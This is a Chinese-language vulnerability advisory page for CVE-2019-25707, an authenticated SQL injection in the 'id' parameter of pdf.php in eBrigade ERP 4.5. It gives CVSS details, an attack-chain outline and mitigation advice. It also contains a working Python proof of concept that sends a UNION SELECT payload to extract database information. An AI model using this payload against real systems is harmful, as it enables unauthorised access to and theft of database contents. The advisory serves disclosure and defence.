CVE-2019-25707 CVSS 7.1 高危

CVE-2019-25707 eBrigade ERP SQL注入漏洞

披露日期: 2026-04-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2019-25707

漏洞类型

SQL注入

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

eBrigade ERP

漏洞概述

eBrigade ERP 4.5 版本存在严重的 SQL 注入漏洞。由于 `pdf.php` 文件中的 `id` 参数未对用户输入进行严格过滤，经过身份验证的攻击者可以通过发送包含恶意构造 SQL 负载的 GET 请求来利用此漏洞。攻击者可借此执行任意 SQL 查询，从而非法提取敏感数据库信息，包括表名和架构详情，对系统数据机密性构成严重威胁。

技术细节

该漏洞的核心成因在于 eBrigade ERP 4.5 版本在处理 `pdf.php` 页面请求时，对传入的 `id` 参数缺乏有效的安全校验和过滤机制。应用程序直接将用户可控的 `id` 参数拼接到后台 SQL 查询语句中执行，导致了经典的 SQL 注入漏洞。尽管攻击者需要具备低权限的账户身份，但无需用户交互即可远程发起攻击。攻击者通过在 HTTP GET 请求的 `id` 参数中注入 UNION SELECT 或布尔盲注等 SQL 语句，可以绕过前端验证，欺骗数据库执行恶意命令。利用此漏洞，攻击者能够读取数据库中的敏感数据，例如获取完整的表结构、字段信息以及用户凭证。这不仅会导致数据泄露，还可能被利用为进一步提升权限或控制服务器的跳板，对系统安全构成严重威胁。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标运行的是 eBrigade ERP 4.5 版本，并确定存在 pdf.php 接口。

STEP 2

获取凭证

攻击者通过钓鱼或暴力破解等方式获取一个低权限账户的登录凭证（满足 PR:L 要求）。

STEP 3

构造载荷

攻击者针对 pdf.php 的 id 参数构造 SQL 注入 Payload，例如使用 UNION SELECT 语句。

STEP 4

发起攻击

攻击者使用认证后的会话，向服务器发送包含恶意 id 参数的 GET 请求。

STEP 5

数据提取

服务器执行恶意 SQL 查询，将数据库结构或敏感数据返回给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target_url = "http://target/ebrigade/pdf.php"
# Example payload to extract database version
payload = "1 UNION SELECT NULL, NULL, version(), NULL-- -"
cookies = {
    "PHPSESSID": "authenticated_session_id_here" # Low privilege auth required
}

params = {
    "id": payload
}

response = requests.get(target_url, params=params, cookies=cookies)

if response.status_code == 200:
    print("PoC executed successfully. Check response content.")
    print(response.text)
else:
    print(f"Failed to execute PoC. Status code: {response.status_code}")

影响范围

eBrigade ERP 4.5

防御指南

临时缓解措施

如果无法立即升级，建议限制对 pdf.php 文件的访问权限，或在 WAF（Web应用防火墙）中部署规则以拦截针对 id 参数的 SQL 注入攻击模式。同时，应确保所有用户账户使用强密码，以减少攻击者获取低权限账户的可能性。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表